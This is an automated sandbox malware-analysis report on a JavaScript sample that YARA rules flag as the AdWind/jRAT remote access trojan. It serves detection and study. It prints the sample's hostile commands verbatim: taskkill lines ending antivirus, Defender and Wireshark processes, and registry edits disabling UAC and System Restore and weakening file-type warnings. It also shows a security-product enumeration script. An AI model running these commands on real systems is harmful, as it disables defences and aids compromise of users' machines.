Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\system32\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg

Uses taskkill to terminate processes

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F	Jump to behavior

Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}CS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\cmukyspiy.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCSh#"
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}CS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\cmukyspiy.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCSh
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}cc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\UK$
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}3
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerS
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Source: javaw.exe, 00000001.00000002.2956709894.0000000009BD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager8

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_020303C0 cpuid

1_2_020303C0

Queries the installed Java version

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7124 VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\3512 VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 1_2_6EEF3DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_6EEF3DFC

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable UAC(promptonsecuredesktop)

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: PromptOnSecureDesktop 0

Disables UAC (registry)

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Disables Windows system restore

Source: C:\Windows\SysWOW64\regedit.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR

Disables zone checking for all users

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

AV process strings found (often used to terminate AV products)

Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EMLPROXY.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AVKService.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: fsgk32.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AVKProxy.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AVKTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBAMTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7RTScan.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FSMA32.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ONLINENT.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SCANWSCS.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SUPERAntiSpyware.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7FWSrvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: guardxservice.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7PSSrvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: acs.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7TSMngr.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BullGuard.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: virusutilities.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: K7EmlPxy.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ClamTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBAMSvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: cscript.exe, 00000008.00000003.1767712530.0000000003233000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767176316.0000000003247000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767364953.0000000003217000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000002.1769555463.000000000324B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000002.1769445590.0000000003234000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767543395.0000000003249000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767515363.0000000003297000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767926565.000000000329A000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1769414316.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1769335671.000000000329B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767741703.00000000032C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FPAVServer.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mbam.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FProtTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ClamWin.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: op_mon.exe

Add executable type to lowriskfiletypes to avoid warning prompt

Source: C:\Windows\SysWOW64\regedit.exe

Registry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

Stealing of Sensitive Information

Yara detected AdWind RAT

Source: Yara match

File source: Process Memory Space: java.exe PID: 3512, type: MEMORYSTR

Yara detected AdWind RATs dll

Source: Yara match	File source: 1.2.javaw.exe.6eef0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.java.exe.9e47cc4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll, type: DROPPED

Remote Access Functionality

Detected ADWIND Rat

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext	Jump to dropped file

Yara detected AdWind RAT

Source: Yara match

File source: Process Memory Space: java.exe PID: 3512, type: MEMORYSTR

Yara detected AdWind RATs dll

Source: Yara match	File source: 1.2.javaw.exe.6eef0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.java.exe.9e47cc4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll, type: DROPPED

Java source code contains strings found in CrossRAT

Source: cmukyspiy.txt.0.dr	Suspicious string: operational.JRat (in operational/Jrat.java)
Source: _0.335919510014015658379257619551515348.class.1.dr	Suspicious string: operational.JRat (in operational/Jrat.java)
Source: access-bridge-32.jar.18.dr	Suspicious string: operational.JRat (in operational/Jrat.java)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF11B0 _Java_com_Title_disableListener@8,		1_2_6EEF11B0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_6EEF1110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW,		1_2_6EEF1110

ID:	1426956
Product:	CloudBasic
Start time:	19:55:07
Start date:	16.04.2024
Sample:	gcahfpmhcn.js
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	5bca887380e1881f351c22574d257e41
SHA1:	987634d53966aa6e84c72ad366bb78e619cb674a
SHA256:	5f4b5467cccbbc2f2c5771d9547e7fca350df341d154f4d83a4442b7a44cdf06

Windows Analysis Report
gcahfpmhcn.js

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report gcahfpmhcn.js

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report
gcahfpmhcn.js